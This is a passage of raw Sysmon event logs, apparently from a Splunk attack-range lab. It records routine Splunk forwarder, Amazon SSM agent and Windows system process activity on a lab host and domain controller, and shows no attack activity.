Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222963Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:49.886{4F8D34B0-19BD-6216-5305-000000003902}1424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000222962Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:49.368{4F8D34B0-19BC-6216-5205-000000003902}39282836C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000222961Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:49.040{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84CE18AE55FB6634823E618B4C4C27A7,SHA256=2FB658CA8ADBF8360F48BF416C0F4AD2B15FC973ACF522696B73461826190E9E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222960Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:48.993{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-19BC-6216-5205-000000003902}3928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000299084Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:50.594{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33B6ABD01206463D1504212B027DF081,SHA256=DEA8B8FE0FACDCB3BB76DD03FBA9A8486385E865CC871254BA5B385074D99C1A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222980Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:47.668{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51752-false10.0.1.12-8000- 23542300x8000000000000000222979Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:50.215{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EBB32F403D02CCD1DA6754D1DE7CA7B3,SHA256=197E33FFA5D45CAB5F60321BEDC1A9F733461C7400AA036135FD20B4F4D102D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222978Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:50.199{4F8D34B0-19BD-6216-5305-000000003902}14241816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000222977Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:50.171{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-168MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222976Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:50.072{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A24F641E6F44F0425FFEDBC36B89633C,SHA256=ADEB11994C8A0F797A33CEBA38FA47EA11CACD056FC58EC119E34A0AE18B719A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299085Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:51.625{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FAF2E44A443C8C88817162F2B3AC07D,SHA256=51A790C174A6358AB020D7B665C6EE1C69C3002A6041E05E8E536B20A519EB4B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222995Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:51.276{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-19BF-6216-5405-000000003902}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222994Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:51.276{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222993Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:51.276{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222992Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:51.276{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222991Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:51.276{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222990Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:51.276{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222989Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:51.276{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222988Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:51.276{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222987Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:51.276{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222986Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:51.276{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222985Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:51.276{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-19BF-6216-5405-000000003902}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222984Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:51.276{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-19BF-6216-5405-000000003902}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222983Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:51.277{4F8D34B0-19BF-6216-5405-000000003902}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000222982Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:51.169{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-169MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222981Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:51.074{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7238016B5B809587C1F61E4C72A3F869,SHA256=E9048BDA85B6815D74966F2974DC462FA48BE69E9B2382E7BF2FC71EA32C0884,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299086Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:52.630{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8ABF91B535107DEC541020BC6653D03A,SHA256=51CF28730B2A61BB0F8DA3BD5ACF73EAB8C4E99D3A534E9385F9A6213696218F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222997Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:52.293{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=18B5E2C1E0EC82646ACAE06AEC56B9A9,SHA256=27D8C9FC48046DE37A30DD6C4760BDC327DD48F013E26867C56CC2B810073DCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222996Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:52.074{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CD4B92B1D07A09BF761D02111553E90,SHA256=A4793D83B2FA3DDA04B4F28F05A82C0B996641A94FD2FEAB2A4E05061609B302,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299087Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:53.632{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=856CAB82D8BFBDDB5304D6F14219FF7B,SHA256=45D377110BBEFA91F3E1E372A2993CD37F1CAA8CC9DE8BD6570D92141E528AAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222998Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:53.090{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69C55A5B93BA3EB43514E815C3F1A325,SHA256=311C2ABC0471590FD736F4C8AFADC4E6461893A0D2338B8E785E2FA346E80842,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299088Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:54.700{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC81CBF685CAB60E8A8FF722DC062911,SHA256=4BCB1CF7E942574B149F20F4DA16993930EA622FCE9D66628E24B474C4A1DF1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222999Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:54.293{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=406AD3805225DFB428F7EF50CA7BF43A,SHA256=343350A29BAC87835CA210B7C04929545C4B6E6B98F9219C8D54B93B63C07C01,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223001Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:52.671{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51753-false10.0.1.12-8000- 23542300x8000000000000000223000Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:25:55.309{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1667A449EB9C9630D346F9F85DF4040F,SHA256=95F55CA0D3DCA127830E41FEC21DC6BD0A522C9E5EAF4EDFEF63EB3C6F837E7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299090Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:55.716{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F188BECE060DEF5342554D856A17A808,SHA256=A1D7E387B8CDA255BDC2886F71505B63AF16EDBC5B10C6D9232CA9C1A6921EFD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299089Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:25:52.639{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 